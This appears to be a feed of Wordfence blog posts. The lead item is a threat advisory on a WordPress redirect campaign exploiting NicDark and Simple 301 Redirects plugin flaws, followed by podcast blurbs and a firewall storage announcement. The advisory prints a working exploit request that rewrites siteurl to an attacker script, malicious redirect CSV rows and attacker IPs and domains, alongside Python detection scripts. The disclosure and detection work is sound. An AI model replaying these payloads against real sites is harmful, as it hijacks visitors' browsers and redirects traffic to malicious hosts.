Malicious WordPress Redirect Campaign Attacking Several Plugins

Over the past few weeks, our Threat Intelligence team has been tracking an active attack campaign targeting a selection of new and old WordPress plugin vulnerabilities. These attacks seek to maliciously redirect traffic from victims’ sites to a number of potentially harmful locations.

Each of the vulnerabilities targeted by this campaign has been public for some time, and Wordfence users are protected either by individual firewall rules or by generic protections built into the plugin. Two of the vulnerabilities in question have firewall rules which are currently available to Premium users only:

  • NicDark Plugins – Unauthenticated Arbitrary Options Update
    • Though several individual plugins are affected, the vulnerability is the same across each and they are covered by a single firewall rule.
    • Affected plugin slugs are prefixed with nd-. Example plugins include Components For WP Bakery Page Builder (slug: nd-shortcodes), Booking (slug: nd-booking), Travel Management (slug: nd-travel), etc.
    • Firewall rule released for Premium users on July 30, 2019
    • Available for Free users starting August 29, 2019
  • Simple 301 Redirects Addon – Bulk Uploader <= 1.2.5 – Unauthenticated Options Update
    • Firewall rule released for Premium users on August 6, 2019
    • Available for Free users starting September 5, 2019

Each of these plugins has an update available which resolves the vulnerability. All WordPress users, regardless of firewall status, are advised to keep their plugins up to date at all times.

In today’s post we’ll look at the attacks associated with this campaign, and we’ll provide some useful indicators of compromise (IOCs) to assist in identifying similar activity.

Attacks Against NicDark Plugins

The vulnerabilities recently patched in plugins developed by NicDark are all exploited by very similar AJAX requests. In each case the plugin registers a nopriv_ AJAX action, which is accessible even by unauthenticated visitors, responsible for importing various WordPress settings. In these requests, key->value pairs of WordPress options and values are parsed out and applied directly to the affected site’s database.

For example, the following POST request is an attempt to attack the Travel Management plugin:

POST /wp-admin/admin-ajax.php?nd_travel_value_import_settings=siteurl%5Bnd_travel_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Range: bytes=0-1000000
Connection: keep-alive
Host: [redacted]
Content-Type: application/x-www-form-urlencoded
Content-Length: 204

action=nd_travel_import_settings_php_function&nd_travel_value_import_settings=siteurl%5Bnd_travel_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1%26%5Bnd_travel_end_option%5D

In each case, the targeted plugin must be declared in both the action parameter and the GET query string parameter defining the new option values, such as this example’s nd_travel_value_import_settings.

Because these vulnerabilities allow unauthenticated users to modify arbitrary WordPress options, it’s possible for attackers to enable registration as an Administrator user. However, we don’t see that behavior associated with this attack campaign. Instead, as seen in the sample request above, the attackers are modifying the siteurl setting of the victim’s site. In this case, the new value is https://jackielovedogs.com/pret.js?l=1. A subsequent request would then make the same change for the home setting.

The result of this modification is that all of the victim site’s scripts will attempt to load relative to that injected path. For example, instead of a site’s jQuery script loading from https://example.com/wp-includes/js/jquery/jquery.js, it would instead cause the visitor’s browser to open the URL https://jackielovedogs.com/pret.js?l=1/wp-includes/js/jquery/jquery.js. In effect, this replaces all of a site’s loaded JavaScript with a file under the attacker’s control.
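To illustrate how the request shape described above can be picked out of ordinary web server logs, here is an added detection example (not code from the original post or from Wordfence). It parses Apache combined-format access log lines, decodes the nd_*_value_import_settings parameter, and flags any request that uses the unauthenticated import action, escalating when the option being written is siteurl or home and the new value points at a host other than the site's own. The payload layout `option[nd_<plugin>_option_value]value&[nd_<plugin>_end_option]` is inferred from the sample request in the post, and the log lines are constructed for the example (the IPs and domain come from the IOC section of this post).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines (not real traffic): a benign
# admin-ajax call followed by two requests shaped like the NicDark attack.
SAMPLE_LOG = """\
203.0.113.10 - - [30/Aug/2019:10:01:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 51 "-" "Mozilla/5.0"
192.99.38.186 - - [30/Aug/2019:10:01:07 +0000] "POST /wp-admin/admin-ajax.php?nd_travel_value_import_settings=siteurl%5Bnd_travel_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1 HTTP/1.1" 200 12 "-" "Mozilla/5.0"
51.38.69.87 - - [30/Aug/2019:10:02:11 +0000] "POST /wp-admin/admin-ajax.php?nd_booking_value_import_settings=home%5Bnd_booking_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1%26%5Bnd_booking_end_option%5D HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Query parameter carrying the options to import, e.g. nd_travel_value_import_settings.
IMPORT_PARAM_RE = re.compile(r'^nd_([a-z0-9_]+)_value_import_settings$')

# Payload layout inferred from the post's sample (assumption):
#   <option>[nd_<plugin>_option_value]<value>&[nd_<plugin>_end_option]
PAYLOAD_RE = re.compile(
    r'^(?P<option>[\w\-]+)\[nd_(?P<plugin>[a-z0-9_]+?)_option_value\]'
    r'(?P<value>.*?)(?:&\[nd_[a-z0-9_]+_end_option\])?$'
)

# Options whose unauthenticated modification is named in the post: the URL
# settings abused here, plus the registration settings it mentions as possible.
SENSITIVE_OPTIONS = {"siteurl", "home", "users_can_register", "default_role"}


def parse_nicdark_payload(raw):
    """Split a decoded import-settings value into plugin, option name and new value."""
    m = PAYLOAD_RE.match(raw)
    if not m:
        return None
    return {"plugin": m["plugin"], "option": m["option"], "value": m["value"]}


def analyze_request(method, target, site_host):
    """Return a finding for an admin-ajax request carrying an nd_* options import, else None."""
    url = urlsplit(target)
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if not IMPORT_PARAM_RE.match(name):
            continue
        for raw in values:
            payload = parse_nicdark_payload(raw)
            if payload is None:
                continue
            reasons = ["unauthenticated options import"]
            if payload["option"] in SENSITIVE_OPTIONS:
                reasons.append("rewrites sensitive option " + payload["option"])
            host = urlsplit(payload["value"]).hostname
            if host and host.lower() != site_host.lower():
                reasons.append("new value points to external host " + host)
            return {
                "method": method,
                "plugin": payload["plugin"],
                "option": payload["option"],
                "value": payload["value"],
                "host": host,
                "severity": "high" if len(reasons) > 1 else "medium",
                "reasons": reasons,
            }
    return None


def scan_log(log_text, site_host):
    """Run analyze_request over every parseable line and attach the client IP and time."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = analyze_request(m["method"], m["target"], site_host)
        if finding:
            finding.update(ip=m["ip"], timestamp=m["ts"])
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG, "example.com"):
        print(f["timestamp"], f["ip"], f["severity"], f["plugin"], f["option"], "->", f["value"])
```

Because the attack places the option payload in the GET query string as well as the POST body, the request line alone is enough for this check; a site whose siteurl or home already reads as an external URL should be treated as compromised regardless of what the logs show.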

Attacks Against Simple 301 Redirects Addon – Bulk Uploader

The other most common attack vector we’ve tracked in this campaign is the Simple 301 Redirects – Addon – Bulk Uploader plugin, which recently patched a vulnerability allowing unauthenticated attackers to inject their own 301 redirect rules onto a victim’s site.

Vulnerable versions of the plugin would constantly listen for the presence of the POST body parameter submit_bulk_301. If this value is present, an uploaded CSV file would be processed and used to import a bulk set of site paths and their redirect destinations.

The following is an example of the CSV files attackers are attempting to upload:

/,https://developsincelock.com/54768?
*,https://developsincelock.com/5868?
/*,https://developsincelock.com/34234?

When a vulnerable site processes this CSV, the site will begin redirecting all of its traffic to the addresses provided.
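The following is an added example, not code from the original post or from the plugin's authors, showing how a defender can review a bulk redirect CSV in the two-column shape above before it is imported, or audit rules already present on a site. It flags rows whose source path is a catch-all (`/`, `*` or `/*`, the forms seen in the sample), whose destination is off-site, or whose destination host matches one of the domains listed in the IOC section of this post, including subdomains of them. The CSV content is constructed for the example and `example.com` stands in for the site's own host.

```python
import csv
import io
from urllib.parse import urlsplit

# Domains from the IOC section of this post.
IOC_DOMAINS = {
    "greatinstagrampage.com",
    "gabriellalovecats.com",
    "jackielovedogs.com",
    "tomorrowwillbehotmaybe.com",
    "go.activeandbanflip.com",
    "wiilberedmodels.com",
    "developsincelock.com",
}

# Source paths that redirect every request; these are the forms in the post's sample.
CATCH_ALL_SOURCES = {"/", "*", "/*"}

# Constructed CSV (not from the post): one legitimate internal redirect, the three
# attacker rows in the shape shown above, and a single-path redirect to an IOC host.
SAMPLE_CSV = """\
/old-about,/about
/,https://developsincelock.com/54768?
*,https://developsincelock.com/5868?
/*,https://developsincelock.com/34234?
/promo,https://go.activeandbanflip.com/x
"""


def domain_matches_ioc(host, iocs=IOC_DOMAINS):
    """True when host equals an IOC domain or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in iocs)


def classify_rules(csv_text, site_host, iocs=IOC_DOMAINS):
    """Return one finding per suspicious source,destination row with the reasons it was flagged."""
    findings = []
    for lineno, row in enumerate(csv.reader(io.StringIO(csv_text)), start=1):
        if len(row) < 2:
            continue  # malformed or blank row; the uploader has nothing to import
        source, destination = row[0].strip(), row[1].strip()
        dest_host = urlsplit(destination).hostname
        reasons = []
        if source in CATCH_ALL_SOURCES:
            reasons.append("catch-all source path")
        if dest_host and dest_host.lower() != site_host.lower():
            reasons.append("external destination")
        if dest_host and domain_matches_ioc(dest_host, iocs):
            reasons.append("destination matches IOC domain")
        if reasons:
            findings.append({
                "line": lineno,
                "source": source,
                "destination": destination,
                "host": dest_host,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in classify_rules(SAMPLE_CSV, "example.com"):
        print(f"line {f['line']}: {f['source']} -> {f['destination']} ({', '.join(f['reasons'])})")
```

A catch-all source combined with an external destination is the signature of this campaign's CSV: a legitimate bulk import almost never sends the site root or a wildcard off-site, so those two reasons together justify blocking the import outright even when the destination host is not yet on any IOC list.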

Other Targeted Plugins

In addition to the primary two above, we have identified related attacks against a number of other formerly-vulnerable plugins, including (but not limited to):

Payload Behavior Analysis

The domains used by the attackers in performing these script injections and redirects rotate with some frequency. New domains appear every few days, and attacks involving older domains taper off. We provide a list of the domains we’ve identified in the IOC section below.

At this time, many of the redirect domains associated with these attacks appear to have been decommissioned, even though these domains still show up in active attacks at the time of this writing. For example, jackielovedogs.com, which appeared in the example request in the ND plugin section above, appears to have been reclaimed by Registrar.eu, a reseller name used by ICANN registrar Openprovider.

Further analysis of this campaign’s long-term behavior is ongoing, and we will provide a followup report as necessary.

Indicators of Compromise (IOCs)

The following IOCs can be used in the process of identifying or tracking activity associated with this campaign.

IP Addresses

The attacks are distributed across a large number of IPs. The top 20 IPs associated with this campaign are listed below. Additionally, addresses listed in bold text appear in the list of IPs Attacking Most Sites as seen in the most recent Wordfence Weekly.

  1. 192.99.38.186
  2. 51.38.69.87
  3. 62.210.252.196
  4. 164.132.44.97
  5. 159.203.81.46
  6. 217.182.95.250
  7. 51.255.43.81
  8. 37.187.198.246
  9. 54.36.246.232
  10. 45.55.152.56
  11. 198.199.100.240
  12. 162.241.175.243
  13. 188.213.175.168
  14. 45.40.143.13
  15. 188.213.166.219
  16. 192.169.227.95
  17. 193.70.2.138
  18. 149.202.75.164
  19. 192.169.157.142
  20. 104.238.97.201

Domain Names

  • greatinstagrampage.com
  • gabriellalovecats.com
  • jackielovedogs.com
  • tomorrowwillbehotmaybe.com
  • go.activeandbanflip.com
  • wiilberedmodels.com
  • developsincelock.com

Conclusion

An active campaign is targeting a number of vulnerabilities in attempts to redirect victim sites’ visitors to potentially harmful destinations. The vulnerabilities in question have all been patched by their developers, so ensure all of your WordPress plugins are up to date. Wordfence Premium users who are unable to update are protected from all of these attacks, while Free users will gain access to these rules in the coming weeks.

Our investigation into these attacks is ongoing. We will continue to track further changes in the campaign’s infrastructure and will provide followup reports as necessary.

As always, please consider sharing this post with your peers to spread awareness of this malicious activity. Additionally, if you believe your site has fallen victim to these or any other attacks, our site cleaning team is here to help. Thank you for reading.

The post Malicious WordPress Redirect Campaign Attacking Several Plugins appeared first on Wordfence.

Podcast Episode 41: KidsCamp and the Next Generation of WordPress Users with Sandy Edwards

As of WordCamp Boston 2019, Sandy Edwards has organized 26 KidsCamps across the US. We talk about what kids do at a WordPress KidsCamp, the success these kids have had publishing with WordPress, and how Sandy teaches basic internet safety and security to the next generation of WordPress users. Sandy is an organizer at WordCamp Orlando as well as a homeschooling mom, and she runs a digital agency helping small businesses benefit from data-driven marketing.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Sandy on Twitter as @sunsanddesign and at datadrivenlabs.io. You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

The post Podcast Episode 41: KidsCamp and the Next Generation of WordPress Users with Sandy Edwards appeared first on Wordfence.

Wordfence Now Works on WP Engine and with Load Balancers

Today we are launching a version of Wordfence containing a new feature for sites on hosting providers with read-only file systems such as WP Engine or for environments where multiple web servers are behind a load balancer. This new feature uses a MySQL storage engine for firewall attack data to protect WordPress sites in complex hosting environments.

For most sites, Wordfence uses the file system to store data about attacks. Writing attack data to the file system is the most efficient method of doing so, and if a site allows for file access, your Wordfence plugin will continue to use this method.

WP Engine’s File System Locking

One of WP Engine’s security features only allows write access to the filesystem when a WordPress administrator is logged in. When there is no active administration session, the file system is read-only. This is a great security feature to limit file changes when no authenticated user is working on the site. However it limits the ability for certain plugins to work optimally, such as Wordfence.

In cases like this where file system access is not allowed, the new Wordfence MySQL storage engine allows WP Engine users to leverage Wordfence’s unparalleled protection for WordPress.

Load Balancers are now supported

In load balanced environments, state is not maintained on individual WordPress servers. This prevents Wordfence from using a file-based storage scheme for the firewall. The new Wordfence MySQL storage engine solves this by allowing a load balanced site to maintain state across multiple web servers, using MySQL as a central storage system.

Wordfence customers can now deploy Wordfence in their load balanced environments and scale their web server cluster horizontally while benefiting from Wordfence protection for the entire installation. We have many larger customers who are very excited about this new feature.

Wordfence MySQL Storage Engine FAQ

As we are sure you have questions, we wanted to provide some answers to determine what this means for your sites.

Q: I’m not using WP Engine. What changes do I have to make?
Nothing will change, and you won’t have to change anything. Wordfence will continue to work exactly as it always has on your site. In fact, we recommend you don’t change anything. This new feature is an accommodation for complex environments only. There are no new settings that you need to adjust.

Q: I’m installing Wordfence on a site at WP Engine. What do I have to do?
Site owners do not have to change anything. Wordfence will detect your WP Engine installation and make the required configuration change to activate the MySQL storage engine for the firewall.

Q: I have a site hosted behind a load balancer. What do I need to do?
In order to have the MySQL storage engine enabled in load balanced environments, a constant will need to be changed in the Wordfence environment.

To configure the WAF to use the MySQL storage engine, you would need to add define('WFWAF_STORAGE_ENGINE', 'mysqli'); to the top of your site's wordfence-waf.php in Extended Protection mode. Our documentation details how to do this.

Q: How will this change performance of Wordfence?
There are no changes in performance for either the Wordfence firewall or the scan engine. This new feature only changes how attack records are stored for sites on WP Engine or behind load balancers. Performance will not be affected.

Q: Do I have to use Wordfence Premium to use the MySQL storage engine?
The MySQL storage engine is completely free. It is available for users running Wordfence Premium and our free community customers. That means that both the free and Premium versions of Wordfence will now be supported on WP Engine.

Q: Anything else we should know?
WP Engine needs to make a change on their end once we release this version of the plugin to ensure that Wordfence is fully supported. There may be a brief delay while they make this change, so please be patient. If you are trying to enable Wordfence on WP Engine and are having trouble, please contact their support team. We are working directly with WP Engine and they are able to reach out to us in case we need to provide assistance.

If you are using a load balanced environment and need help enabling this new feature, please don’t hesitate to reach out to our support team either via our ticketing system for Premium customers, or via our public forums if you are a free customer.

We welcome your feedback about Wordfence’s MySQL storage engine and how Wordfence supports your security on WP Engine and load balanced WordPress environments.

All product names, trademarks and registered trademarks are property of their respective owners. All company, product and service names used in this post are for identification purposes only. Use of these names, trademarks and brands does not imply endorsement.

The post Wordfence Now Works on WP Engine and with Load Balancers appeared first on Wordfence.

Podcast Episode 40: WordPress Considers Ditching Signed Core Updates

A recent discussion among WordPress core developers about removing support for code signing in core caught our attention. Code signing support was included with the WordPress 5.2 release. The discussion centers around removing code signing and implementing SSL verification and hashes to verify code integrity. In this week’s episode we chat about the history behind the vulnerability found by Wordfence’s Matt Barry, which is what motivated the addition of code signing to WordPress core. We review several high profile supply chain attacks and discuss how SSL and hashes would not protect against a sophisticated attack on WordPress core servers.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

Some sources we reference in this week’s episode include:

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Do you have thoughts about WordPress core update code signing? Please feel free to post your feedback in the comments below.

The post Podcast Episode 40: WordPress Considers Ditching Signed Core Updates appeared first on Wordfence.

Podcast Episode 39: Headless eCommerce, Scaling for eCommerce Growth with Topher DeRosia

Topher DeRosia is the Developer Evangelist for BigCommerce and a frequent WordCamp speaker. He’s worked with WordPress for a long time and is the man behind HeroPress, telling the stories of people whose lives have been transformed by WordPress. HeroPress is now syndicated on WordPress.org/news, bringing these inspirational stories to an even wider audience. At WordCamp Boston, Topher and Kathy talked about everything WordPress, from security to eCommerce, HeroPress, headless WordPress, headless eCommerce as well as how these new methods of distributing content and commerce will change publishing.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Topher on Twitter as @topher1kenobe and at topher1kenobe.com and at HeroPress.com. You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

The post Podcast Episode 39: Headless eCommerce, Scaling for eCommerce Growth with Topher DeRosia appeared first on Wordfence.

Podcast Episode 38: Automattic Buys Tumblr from Verizon

The Wall Street Journal reported on Monday, August 12, 2019 that Verizon is selling social media and blogging platform Tumblr to Automattic for an undisclosed sum, though rumors state that it may be as low as $3 million. After the announcement, Automattic CEO Matt Mullenweg discussed the news on PostStatus, stating that they plan to migrate infrastructure off of Verizon, move Tumblr’s backend to WordPress, and support the same APIs on both WordPress.com and Tumblr. Mullenweg noted on PostStatus that this acquisition is “by far the largest investment or acquisition Automattic has ever made.” In this episode, we discuss the implications for Tumblr, WordPress, and Automattic.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover Automattic’s purchase of Tumblr from Verizon. Some sources we reference include:

  • The announcement in the Wall Street Journal.
  • Coverage on PostStatus, where Matt Mullenweg answered questions from the community. David Bisset and Brian Krogsgard did a great job of covering the story.
  • An Axios article reporting that the price was approximately $3 million.
  • A post on WP Tavern covering the implications of WordPress on the Tumblr backend.
  • An older article detailing Tumblr architecture.
  • Hacker News discussion about the Tumblr acquisition.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Do you have thoughts about Automattic’s buy of Tumblr? Please feel free to post your feedback in the comments below.

The post Podcast Episode 38: Automattic Buys Tumblr from Verizon appeared first on Wordfence.

Podcast Episode 37: Vito Peleg Talks Breaking the Agency Glass Ceiling & Building a Product with Customers

In this episode, Mark chats with Vito Peleg, the founder of WP Feedback, a plugin that helps WordPress-focused agencies streamline approval and support for their customers. Vito talks about the glass ceiling in agencies where managing people and projects begins to inhibit growth and profitability. He also shares some interesting thoughts on where pain points lie and how to move past them, as well as how to effectively leverage your own customers to inform product design.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Vito and Feedback WP on Twitter as @FeedbackWP and at www.wpfeedback.co. You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

The post Podcast Episode 37: Vito Peleg Talks Breaking the Agency Glass Ceiling & Building a Product with Customers appeared first on Wordfence.

Podcast Episode 36: Proposals to Improve WordPress Include WP Notify and Security Backporting Changes

This week, we talk about our corporate trip to DEF CON, the WordPress security team’s proposal to backport security fixes to fewer releases, a new feature proposal called WP Notify that has a number of very positive implications for WordPress users, Cloudflare’s decision to terminate service for 8Chan, and a European court’s ruling that companies using the Facebook “like” button are liable for data collection.

Here are timestamps in case you would like to jump around:
1:18 The Defiant trip to DEF CON
3:05 WordPress Security team proposes backporting fixes to fewer releases
6:58 Feature Proposal: WP Notify
11:52 Cloudflare terminates service for 8Chan
16:05 Sites using Facebook “like” button liable for data

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant. To learn more about Open, visit open.film. Please feel free to post your feedback in the comments below.

The post Podcast Episode 36: Proposals to Improve WordPress Include WP Notify and Security Backporting Changes appeared first on Wordfence.

Podcast Episode 35: Security Researcher Jem Turner Talks About Pipdig Scandal

Jem Turner was one of the security researchers that found malicious code in Pipdig’s P3 plugin. Both Jem and Wordfence’s Mikey Veenstra found the P3 plugin to contain a number of suspicious or malicious features, including a remote “killswitch,” an obfuscated function used to change users’ passwords, and code which generated hourly requests to DDoS a competitor’s site. At WordCamp Europe, Mark sat down with Jem and asked about her process of finding this malicious code and the diligence in her research. Jem also talks about the unexpected reaction from the Pipdig developer and their users, and how the community of bloggers banded together to help each other.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Jem on Twitter as @jemjabella and at www.thejempire.net. You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

The post Podcast Episode 35: Security Researcher Jem Turner Talks About Pipdig Scandal appeared first on Wordfence.
